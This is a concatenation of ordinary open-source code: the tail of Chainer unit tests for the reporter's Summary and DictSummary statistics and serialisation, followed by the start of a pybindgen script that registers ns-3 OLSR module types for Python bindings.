self.summary.make_statistics() testing.assert_allclose(mean, 2) testing.assert_allclose(std, numpy.sqrt(2 / 3)) def test_float(self): self.summary.add(1.) self.summary.add(2.) self.summary.add(3.) mean = self.summary.compute_mean() testing.assert_allclose(mean, 2.) mean, std = self.summary.make_statistics() testing.assert_allclose(mean, 2.) testing.assert_allclose(std, numpy.sqrt(2. 
/ 3.)) def test_weight(self): self.summary.add(1., 0.5) self.summary.add(2., numpy.array(0.4)) self.summary.add(3., chainer.Variable(numpy.array(0.3))) mean = self.summary.compute_mean().array val = (1 * 0.5 + 2 * 0.4 + 3 * 0.3) / (0.5 + 0.4 + 0.3) testing.assert_allclose(mean, val) def test_serialize(self): self.summary.add(1.) self.summary.add(2.) summary = chainer.reporter.Summary() testing.save_and_load_npz(self.summary, summary) summary.add(3.) mean = summary.compute_mean() testing.assert_allclose(mean, 2.) mean, std = summary.make_statistics() testing.assert_allclose(mean, 2.) testing.assert_allclose(std, numpy.sqrt(2. / 3.)) @attr.gpu def test_serialize_cupy(self): xp = cuda.cupy self.summary.add(xp.array(1, 'f')) self.summary.add(xp.array(2, 'f')) summary = chainer.reporter.Summary() testing.save_and_load_npz(self.summary, summary) summary.add(xp.array(3, 'f')) mean = summary.compute_mean() testing.assert_allclose(mean, 2.) mean, std = summary.make_statistics() testing.assert_allclose(mean, 2.) testing.assert_allclose(std, numpy.sqrt(2. / 3.)) def test_serialize_backward_compat(self): with tempfile.NamedTemporaryFile(delete=False) as f: # old version does not save anything numpy.savez(f, dummy=0) with testing.assert_warns(UserWarning): chainer.serializers.load_npz(f.name, self.summary) self.summary.add(2.) self.summary.add(3.) 
mean = self.summary.compute_mean() testing.assert_allclose(mean, 2.5) mean, std = self.summary.make_statistics() testing.assert_allclose(mean, 2.5) testing.assert_allclose(std, 0.5) class TestDictSummary(unittest.TestCase): def setUp(self): self.summary = chainer.reporter.DictSummary() def check(self, summary, data): mean = summary.compute_mean() self.assertEqual(set(mean.keys()), set(data.keys())) for name in data.keys(): m = sum(data[name]) / len(data[name]) testing.assert_allclose(mean[name], m) stats = summary.make_statistics() self.assertEqual( set(stats.keys()), set(data.keys()).union(name + '.std' for name in data.keys())) for name in data.keys(): m = sum(data[name]) / len(data[name]) s = numpy.sqrt( sum(x * x for x in data[name]) / len(data[name]) - m * m) testing.assert_allclose(stats[name], m) testing.assert_allclose(stats[name + '.std'], s) def test(self): self.summary.add({'numpy': numpy.array(3, 'f'), 'int': 1, 'float': 4.}) self.summary.add({'numpy': numpy.array(1, 'f'), 'int': 5, 'float': 9.}) self.summary.add({'numpy': numpy.array(2, 'f'), 'int': 6, 'float': 5.}) self.summary.add({'numpy': numpy.array(3, 'f'), 'int': 5, 'float': 8.}) self.check(self.summary, { 'numpy': (3., 1., 2., 3.), 'int': (1, 5, 6, 5), 'float': (4., 9., 5., 8.), }) @attr.gpu def test_cupy(self): xp = cuda.cupy self.summary.add({'cupy': xp.array(3, 'f')}) self.summary.add({'cupy': xp.array(1, 'f')}) self.summary.add({'cupy': xp.array(2, 'f')}) self.summary.add({'cupy': xp.array(3, 'f')}) self.check(self.summary, {'cupy': (3., 1., 2., 3.)}) def test_sparse(self): self.summary.add({'a': 3., 'b': 1.}) self.summary.add({'a': 1., 'b': 5., 'c': 9.}) self.summary.add({'b': 6.}) self.summary.add({'a': 3., 'b': 5., 'c': 8.}) self.check(self.summary, { 'a': (3., 1., 3.), 'b': (1., 5., 6., 5.), 'c': (9., 8.), }) def test_weight(self): self.summary.add({'a': (1., 0.5)}) self.summary.add({'a': (2., numpy.array(0.4))}) self.summary.add({'a': (3., chainer.Variable(numpy.array(0.3)))}) mean = 
self.summary.compute_mean() val = (1 * 0.5 + 2 * 0.4 + 3 * 0.3) / (0.5 + 0.4 + 0.3) testing.assert_allclose(mean['a'], val) with self.assertRaises(ValueError): self.summary.add({'a': (4., numpy.array([0.5]))}) with self.assertRaises(ValueError): self.summary.add({'a': (4., chainer.Variable(numpy.array([0.5])))}) def test_serialize(self): self.summary.add({'numpy': numpy.array(3, 'f'), 'int': 1, 'float': 4.}) self.summary.add({'numpy': numpy.array(1, 'f'), 'int': 5, 'float': 9.}) self.summary.add({'numpy': numpy.array(2, 'f'), 'int': 6, 'float': 5.}) summary = chainer.reporter.DictSummary() testing.save_and_load_npz(self.summary, summary) summary.add({'numpy': numpy.array(3, 'f'), 'int': 5, 'float': 8.}) self.check(summary, { 'numpy': (3., 1., 2., 3.), 'int': (1, 5, 6, 5), 'float': (4., 9., 5., 8.), }) @attr.gpu def test_serialize_cupy(self): xp = cuda.cupy self.summary.add({'cupy': xp.array(3, 'f')}) self.summary.add({'cupy': xp.array(1, 'f')}) self.summary.add({'cupy': xp.array(2, 'f')}) summary = chainer.reporter.DictSummary() testing.save_and_load_npz(self.summary, summary) summary.add({'cupy': xp.array(3, 'f')}) self.check(summary, {'cupy': (3., 1., 2., 3.)}) def test_serialize_names_with_slash(self): self.summary.add({'a/b': 3., '/a/b': 1., 'a/b/': 4.}) self.summary.add({'a/b': 1., '/a/b': 5., 'a/b/': 9.}) self.summary.add({'a/b': 2., '/a/b': 6., 'a/b/': 5.}) summary = chainer.reporter.DictSummary() testing.save_and_load_npz(self.summary, summary) summary.add({'a/b': 3., '/a/b': 5., 'a/b/': 8.}) self.check(summary, { 'a/b': (3., 1., 2., 3.), '/a/b': (1., 5., 6., 5.), 'a/b/': (4., 9., 5., 8.), }) def test_serialize_overwrite_different_names(self): self.summary.add({'a': 3., 'b': 1.}) self.summary.add({'a': 1., 'b': 5.}) summary = chainer.reporter.DictSummary() summary.add({'c': 5.}) testing.save_and_load_npz(self.summary, summary) self.check(summary, { 'a': (3., 1.), 'b': (1., 5.), }) def test_serialize_overwrite_rollback(self): self.summary.add({'a': 3., 'b': 
1.}) self.summary.add({'a': 1., 'b': 5.}) with tempfile.NamedTemporaryFile(delete=False) as f: chainer.serializers.save_npz(f.name, self.summary) self.summary.add({'a': 2., 'b': 6., 'c': 5.}) self.summary.add({'a': 3., 'b': 4., 'c': 6.}) chainer.serializers.load_npz(f.name, self.summary) self.summary.add({'a': 3., 'b': 5., 'c': 8.}) self.check(self.summary, { 'a': (3., 1., 3.), 'b': (1., 5., 5.), 'c': (8.,), }) def test_serialize_backward_compat(self): with tempfile.NamedTemporaryFile(delete=False) as f: # old version does not save anything numpy.savez(f, dummy=0) with testing.assert_warns(UserWarning): chainer.serializers.load_npz(f.name, self.summary) def test_serialize_backward_compat_overwrite(self): self.summary.add({'a': 3., 'b': 1., 'c': 4.}) self.summary.add({'a': 1., 'b': 5., 'c': 9.}) with tempfile.NamedTemporaryFile(delete=False) as f: # old version does not save anything numpy.savez(f, dummy=0) with testing.assert_warns(UserWarning): chainer.serializers.load_npz(f.name, self.summary) self.summary.add({'a': 9., 'b': 2.}) self.summary.add({'a': 6., 'b': 5.}) self.check(self.summary, { 'a': (9., 6.), 'b': (2., 5.), }) testing.run_module(__name__, __file__)
mit
chenzheng128/ns-3-dev-git
src/olsr/bindings/modulegen__gcc_ILP32.py
8
502481
from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers import pybindgen.settings import warnings class ErrorHandler(pybindgen.settings.ErrorHandler): def handle_error(self, wrapper, exception, traceback_): warnings.warn("exception %r in wrapper %s" % (exception, wrapper)) return True pybindgen.settings.error_handler = ErrorHandler() import sys def module_init(): root_module = Module('ns.olsr', cpp_namespace='::ns3') return root_module def register_types(module): root_module = module.get_root() ## address.h (module 'network'): ns3::Address [class] module.add_class('Address', import_from_module='ns.network') ## address.h (module 'network'): ns3::Address::MaxSize_e [enumeration] module.add_enum('MaxSize_e', ['MAX_SIZE'], outer_class=root_module['ns3::Address'], import_from_module='ns.network') ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList [class] module.add_class('AttributeConstructionList', import_from_module='ns.core') ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item [struct] module.add_class('Item', import_from_module='ns.core', outer_class=root_module['ns3::AttributeConstructionList']) ## buffer.h (module 'network'): ns3::Buffer [class] module.add_class('Buffer', import_from_module='ns.network') ## buffer.h (module 'network'): ns3::Buffer::Iterator [class] module.add_class('Iterator', import_from_module='ns.network', outer_class=root_module['ns3::Buffer']) ## packet.h (module 'network'): ns3::ByteTagIterator [class] module.add_class('ByteTagIterator', import_from_module='ns.network') ## packet.h (module 'network'): ns3::ByteTagIterator::Item [class] module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagIterator']) ## byte-tag-list.h (module 'network'): ns3::ByteTagList [class] module.add_class('ByteTagList', import_from_module='ns.network') ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator [class] 
module.add_class('Iterator', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagList']) ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item [struct] module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagList::Iterator']) ## callback.h (module 'core'): ns3::CallbackBase [class] module.add_class('CallbackBase', import_from_module='ns.core') ## event-garbage-collector.h (module 'core'): ns3::EventGarbageCollector [class] module.add_class('EventGarbageCollector', import_from_module='ns.core') ## event-id.h (module 'core'): ns3::EventId [class] module.add_class('EventId', import_from_module='ns.core') ## hash.h (module 'core'): ns3::Hasher [class] module.add_class('Hasher', import_from_module='ns.core') ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress [class] module.add_class('Inet6SocketAddress', import_from_module='ns.network') ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress [class] root_module['ns3::Inet6SocketAddress'].implicitly_converts_to(root_module['ns3::Address']) ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress [class] module.add_class('InetSocketAddress', import_from_module='ns.network') ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress [class] root_module['ns3::InetSocketAddress'].implicitly_converts_to(root_module['ns3::Address']) ## int-to-type.h (module 'core'): ns3::IntToType<0> [struct] module.add_class('IntToType', import_from_module='ns.core', template_parameters=['0']) ## int-to-type.h (module 'core'): ns3::IntToType<0>::v_e [enumeration] module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 0 >'], import_from_module='ns.core') ## int-to-type.h (module 'core'): ns3::IntToType<1> [struct] module.add_class('IntToType', import_from_module='ns.core', template_parameters=['1']) ## int-to-type.h (module 'core'): ns3::IntToType<1>::v_e [enumeration] module.add_enum('v_e', 
['value'], outer_class=root_module['ns3::IntToType< 1 >'], import_from_module='ns.core') ## int-to-type.h (module 'core'): ns3::IntToType<2> [struct] module.add_class('IntToType', import_from_module='ns.core', template_parameters=['2']) ## int-to-type.h (module 'core'): ns3::IntToType<2>::v_e [enumeration] module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 2 >'], import_from_module='ns.core') ## int-to-type.h (module 'core'): ns3::IntToType<3> [struct] module.add_class('IntToType', import_from_module='ns.core', template_parameters=['3']) ## int-to-type.h (module 'core'): ns3::IntToType<3>::v_e [enumeration] module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 3 >'], import_from_module='ns.core') ## int-to-type.h (module 'core'): ns3::IntToType<4> [struct] module.add_class('IntToType', import_from_module='ns.core', template_parameters=['4']) ## int-to-type.h (module 'core'): ns3::IntToType<4>::v_e [enumeration] module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 4 >'], import_from_module='ns.core') ## int-to-type.h (module 'core'): ns3::IntToType<5> [struct] module.add_class('IntToType', import_from_module='ns.core', template_parameters=['5']) ## int-to-type.h (module 'core'): ns3::IntToType<5>::v_e [enumeration] module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 5 >'], import_from_module='ns.core') ## int-to-type.h (module 'core'): ns3::IntToType<6> [struct] module.add_class('IntToType', import_from_module='ns.core', template_parameters=['6']) ## int-to-type.h (module 'core'): ns3::IntToType<6>::v_e [enumeration] module.add_enum('v_e', ['value'], outer_class=root_module['ns3::IntToType< 6 >'], import_from_module='ns.core') ## ipv4-address.h (module 'network'): ns3::Ipv4Address [class] module.add_class('Ipv4Address', import_from_module='ns.network') ## ipv4-address.h (module 'network'): ns3::Ipv4Address [class] 
root_module['ns3::Ipv4Address'].implicitly_converts_to(root_module['ns3::Address']) ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress [class] module.add_class('Ipv4InterfaceAddress', import_from_module='ns.internet') ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e [enumeration] module.add_enum('InterfaceAddressScope_e', ['HOST', 'LINK', 'GLOBAL'], outer_class=root_module['ns3::Ipv4InterfaceAddress'], import_from_module='ns.internet') ## ipv4-address.h (module 'network'): ns3::Ipv4Mask [class] module.add_class('Ipv4Mask', import_from_module='ns.network') ## ipv4-routing-helper.h (module 'internet'): ns3::Ipv4RoutingHelper [class] module.add_class('Ipv4RoutingHelper', allow_subclassing=True, import_from_module='ns.internet') ## ipv6-address.h (module 'network'): ns3::Ipv6Address [class] module.add_class('Ipv6Address', import_from_module='ns.network') ## ipv6-address.h (module 'network'): ns3::Ipv6Address [class] root_module['ns3::Ipv6Address'].implicitly_converts_to(root_module['ns3::Address']) ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix [class] module.add_class('Ipv6Prefix', import_from_module='ns.network') ## mac48-address.h (module 'network'): ns3::Mac48Address [class] module.add_class('Mac48Address', import_from_module='ns.network') ## mac48-address.h (module 'network'): ns3::Mac48Address [class] root_module['ns3::Mac48Address'].implicitly_converts_to(root_module['ns3::Address']) ## node-container.h (module 'network'): ns3::NodeContainer [class] module.add_class('NodeContainer', import_from_module='ns.network') ## non-copyable.h (module 'core'): ns3::NonCopyable [class] module.add_class('NonCopyable', destructor_visibility='protected', import_from_module='ns.core') ## object-base.h (module 'core'): ns3::ObjectBase [class] module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core') ## object.h (module 'core'): ns3::ObjectDeleter [struct] 
module.add_class('ObjectDeleter', import_from_module='ns.core') ## object-factory.h (module 'core'): ns3::ObjectFactory [class] module.add_class('ObjectFactory', import_from_module='ns.core') ## olsr-helper.h (module 'olsr'): ns3::OlsrHelper [class] module.add_class('OlsrHelper', parent=root_module['ns3::Ipv4RoutingHelper']) ## packet-metadata.h (module 'network'): ns3::PacketMetadata [class] module.add_class('PacketMetadata', import_from_module='ns.network') ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item [struct] module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::PacketMetadata']) ## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item [enumeration] module.add_enum('', ['PAYLOAD', 'HEADER', 'TRAILER'], outer_class=root_module['ns3::PacketMetadata::Item'], import_from_module='ns.network') ## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator [class] module.add_class('ItemIterator', import_from_module='ns.network', outer_class=root_module['ns3::PacketMetadata']) ## packet.h (module 'network'): ns3::PacketTagIterator [class] module.add_class('PacketTagIterator', import_from_module='ns.network') ## packet.h (module 'network'): ns3::PacketTagIterator::Item [class] module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::PacketTagIterator']) ## packet-tag-list.h (module 'network'): ns3::PacketTagList [class] module.add_class('PacketTagList', import_from_module='ns.network') ## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData [struct] module.add_class('TagData', import_from_module='ns.network', outer_class=root_module['ns3::PacketTagList']) ## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData::TagData_e [enumeration] module.add_enum('TagData_e', ['MAX_SIZE'], outer_class=root_module['ns3::PacketTagList::TagData'], import_from_module='ns.network') ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, 
ns3::ObjectBase, ns3::ObjectDeleter> [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Object', 'ns3::ObjectBase', 'ns3::ObjectDeleter'], parent=root_module['ns3::ObjectBase'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simulator.h (module 'core'): ns3::Simulator [class] module.add_class('Simulator', destructor_visibility='private', import_from_module='ns.core') ## simulator.h (module 'core'): ns3::Simulator [enumeration] module.add_enum('', ['NO_CONTEXT'], outer_class=root_module['ns3::Simulator'], import_from_module='ns.core') ## system-wall-clock-ms.h (module 'core'): ns3::SystemWallClockMs [class] module.add_class('SystemWallClockMs', import_from_module='ns.core') ## tag.h (module 'network'): ns3::Tag [class] module.add_class('Tag', import_from_module='ns.network', parent=root_module['ns3::ObjectBase']) ## tag-buffer.h (module 'network'): ns3::TagBuffer [class] module.add_class('TagBuffer', import_from_module='ns.network') ## nstime.h (module 'core'): ns3::TimeWithUnit [class] module.add_class('TimeWithUnit', import_from_module='ns.core') ## timer.h (module 'core'): ns3::Timer [class] module.add_class('Timer', import_from_module='ns.core') ## timer.h (module 'core'): ns3::Timer::DestroyPolicy [enumeration] module.add_enum('DestroyPolicy', ['CANCEL_ON_DESTROY', 'REMOVE_ON_DESTROY', 'CHECK_ON_DESTROY'], outer_class=root_module['ns3::Timer'], import_from_module='ns.core') ## timer.h (module 'core'): ns3::Timer::State [enumeration] module.add_enum('State', ['RUNNING', 'EXPIRED', 'SUSPENDED'], outer_class=root_module['ns3::Timer'], import_from_module='ns.core') ## timer-impl.h (module 'core'): ns3::TimerImpl [class] module.add_class('TimerImpl', allow_subclassing=True, import_from_module='ns.core') ## type-id.h (module 'core'): ns3::TypeId [class] module.add_class('TypeId', 
import_from_module='ns.core') ## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration] module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core') ## type-id.h (module 'core'): ns3::TypeId::SupportLevel [enumeration] module.add_enum('SupportLevel', ['SUPPORTED', 'DEPRECATED', 'OBSOLETE'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core') ## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct] module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId']) ## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct] module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId']) ## empty.h (module 'core'): ns3::empty [class] module.add_class('empty', import_from_module='ns.core') ## int64x64-double.h (module 'core'): ns3::int64x64_t [class] module.add_class('int64x64_t', import_from_module='ns.core') ## int64x64-double.h (module 'core'): ns3::int64x64_t::impl_type [enumeration] module.add_enum('impl_type', ['int128_impl', 'cairo_impl', 'ld_impl'], outer_class=root_module['ns3::int64x64_t'], import_from_module='ns.core') ## chunk.h (module 'network'): ns3::Chunk [class] module.add_class('Chunk', import_from_module='ns.network', parent=root_module['ns3::ObjectBase']) ## header.h (module 'network'): ns3::Header [class] module.add_class('Header', import_from_module='ns.network', parent=root_module['ns3::Chunk']) ## ipv4-header.h (module 'internet'): ns3::Ipv4Header [class] module.add_class('Ipv4Header', import_from_module='ns.internet', parent=root_module['ns3::Header']) ## ipv4-header.h (module 'internet'): ns3::Ipv4Header::DscpType [enumeration] module.add_enum('DscpType', ['DscpDefault', 'DSCP_CS1', 'DSCP_AF11', 'DSCP_AF12', 'DSCP_AF13', 'DSCP_CS2', 'DSCP_AF21', 'DSCP_AF22', 'DSCP_AF23', 'DSCP_CS3', 'DSCP_AF31', 
'DSCP_AF32', 'DSCP_AF33', 'DSCP_CS4', 'DSCP_AF41', 'DSCP_AF42', 'DSCP_AF43', 'DSCP_CS5', 'DSCP_EF', 'DSCP_CS6', 'DSCP_CS7'], outer_class=root_module['ns3::Ipv4Header'], import_from_module='ns.internet') ## ipv4-header.h (module 'internet'): ns3::Ipv4Header::EcnType [enumeration] module.add_enum('EcnType', ['ECN_NotECT', 'ECN_ECT1', 'ECN_ECT0', 'ECN_CE'], outer_class=root_module['ns3::Ipv4Header'], import_from_module='ns.internet') ## object.h (module 'core'): ns3::Object [class] module.add_class('Object', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >']) ## object.h (module 'core'): ns3::Object::AggregateIterator [class] module.add_class('AggregateIterator', import_from_module='ns.core', outer_class=root_module['ns3::Object']) ## random-variable-stream.h (module 'core'): ns3::RandomVariableStream [class] module.add_class('RandomVariableStream', import_from_module='ns.core', parent=root_module['ns3::Object']) ## random-variable-stream.h (module 'core'): ns3::SequentialRandomVariable [class] module.add_class('SequentialRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', 
template_parameters=['ns3::AttributeChecker', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::EventImpl', 'ns3::empty', 'ns3::DefaultDeleter<ns3::EventImpl>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> > [class] module.add_class('SimpleRefCount', 
automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Hash::Implementation', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Hash::Implementation>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Ipv4MulticastRoute', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Ipv4MulticastRoute>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Ipv4Route', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Ipv4Route>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::NetDeviceQueue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::NetDeviceQueue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> > 
[class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::NixVector', 'ns3::empty', 'ns3::DefaultDeleter<ns3::NixVector>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::OutputStreamWrapper', 'ns3::empty', 'ns3::DefaultDeleter<ns3::OutputStreamWrapper>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Packet', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Packet>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::QueueItem', 'ns3::empty', 'ns3::DefaultDeleter<ns3::QueueItem>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, 
ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## socket.h (module 'network'): ns3::Socket [class] module.add_class('Socket', import_from_module='ns.network', parent=root_module['ns3::Object']) ## socket.h (module 'network'): ns3::Socket::SocketErrno [enumeration] module.add_enum('SocketErrno', ['ERROR_NOTERROR', 'ERROR_ISCONN', 'ERROR_NOTCONN', 'ERROR_MSGSIZE', 'ERROR_AGAIN', 'ERROR_SHUTDOWN', 'ERROR_OPNOTSUPP', 'ERROR_AFNOSUPPORT', 'ERROR_INVAL', 'ERROR_BADF', 'ERROR_NOROUTETOHOST', 'ERROR_NODEV', 'ERROR_ADDRNOTAVAIL', 'ERROR_ADDRINUSE', 'SOCKET_ERRNO_LAST'], outer_class=root_module['ns3::Socket'], import_from_module='ns.network') ## socket.h (module 'network'): ns3::Socket::SocketType [enumeration] module.add_enum('SocketType', ['NS3_SOCK_STREAM', 'NS3_SOCK_SEQPACKET', 'NS3_SOCK_DGRAM', 'NS3_SOCK_RAW'], outer_class=root_module['ns3::Socket'], import_from_module='ns.network') ## socket.h (module 'network'): ns3::Socket::SocketPriority [enumeration] module.add_enum('SocketPriority', ['NS3_PRIO_BESTEFFORT', 'NS3_PRIO_FILLER', 'NS3_PRIO_BULK', 'NS3_PRIO_INTERACTIVE_BULK', 'NS3_PRIO_INTERACTIVE', 'NS3_PRIO_CONTROL'], outer_class=root_module['ns3::Socket'], import_from_module='ns.network') ## socket.h (module 'network'): ns3::Socket::Ipv6MulticastFilterMode [enumeration] module.add_enum('Ipv6MulticastFilterMode', ['INCLUDE', 'EXCLUDE'], outer_class=root_module['ns3::Socket'], import_from_module='ns.network') ## socket.h (module 'network'): ns3::SocketIpTosTag [class] module.add_class('SocketIpTosTag', import_from_module='ns.network', parent=root_module['ns3::Tag']) ## socket.h (module 
